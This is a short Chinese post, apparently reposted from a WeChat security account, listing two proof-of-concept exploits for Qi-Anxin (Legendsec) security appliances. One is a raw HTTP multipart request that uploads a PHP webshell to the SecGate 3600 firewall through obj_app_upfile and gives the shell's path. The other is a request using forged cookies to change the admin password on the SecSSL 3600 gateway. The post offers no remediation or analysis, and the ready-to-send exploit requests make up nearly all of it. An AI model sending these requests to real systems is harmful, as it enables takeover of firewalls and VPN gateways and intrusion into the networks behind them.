网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传
POC
POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept-Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="vulntest.php"Content-Type: text/plain<?php php马?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--
木马路径:attachements/xxx.php
网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
POC
POST /changepass.php?type=2Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@
原文始发于微信公众号(浪飒sec):奇安信网神安全设备漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论